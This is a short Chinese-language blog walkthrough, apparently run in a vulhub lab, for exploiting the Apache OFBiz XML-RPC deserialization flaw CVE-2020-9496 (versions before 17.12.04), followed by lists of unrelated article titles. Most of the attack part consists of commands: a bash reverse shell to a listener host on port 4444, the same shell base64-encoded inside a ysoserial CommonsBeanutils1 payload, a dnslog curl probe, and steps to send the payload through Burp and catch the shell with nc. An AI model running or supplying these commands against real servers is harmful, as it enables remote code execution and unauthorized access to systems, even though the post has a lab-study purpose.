影响版本

- Apache Ofbiz:< 17.12.04

访问

https://192.168.49.2:8443/webtools/control/xmlrpc

抓包

进行数据包修改

payload地址

https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496

使用ysoserial的CommonsBeanutils1来生成Payload

首先对命令进行加密

http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/192.168.49.5/4444 0>&1

使用ysoserial工具进行一次base64编码

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjUvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "curl kktk1d.dnslog.cn" | base64 | tr -d "\n"

把生成的exp放入到burp的数据包中发送,查看nc监听以返回shell



最新文章

  1. HashMap实现缓存
  2. 自定义AlertDialog控件的使用(AndroidStudio)
  3. Go! new Hello World, 我的第一个Go程序
  4. html5+css3 微信开发-学习实例
  5. loose coupling之函数签名
  6. C# 根据身份证号码获取简易信息
  7. Linux下的mongodb分片部署
  8. Socket编程(九)
  9. Textarea - 百度富文本编辑器插件UEditor
  10. Spring 4.0 中的 WebSocket 架构
  11. PHP学习之-1.2 认识PHP脚本标识
  12. spring mvc 与 jasper Report集成
  13. Android版数据结构与算法(八):二叉排序树
  14. Docker 学习3 Docker镜像管理基础
  15. 网络学习day04_VLSM、子网划分
  16. 回客科技 面试的 实现ioc 容器用到的技术,简述BeanFactory的实现原理,大搜车面试的 spring 怎么实现的依赖注入(DI)
  17. vs2017 C4996 错误
  18. kubernetes的应用数据持久化
  19. Yii2 数据操作Query Builder查询数据
  20. 字符集不同导致的ORA-00972

热门文章

  1. 「模拟8.18」字符串(卡特兰数)&#183;乌鸦喝水(树状数组,二分)&#183;所驼门王的宝藏(tarjan,拓扑)
  2. Linux中查看网络命令
  3. docker-compose 部署 Apollo 自定义环境
  4. Map类型的Json格式
  5. 『动善时』JMeter基础 — 49、使用JMeter自身代理录制APP测试脚本
  6. RobotFramework + Python 自动化入门 二 (关键字)
  7. typescript 中的 infer 关键字的理解
  8. 20201123 实验三《python程序设计》实验报告
  9. IP地址与子网的划分
  10. 【Spring Cloud &amp; Alibaba 实战 | 总结篇】Spring Cloud Gateway + Spring Security OAuth2 + JWT 实现微服务统一认证授权和鉴权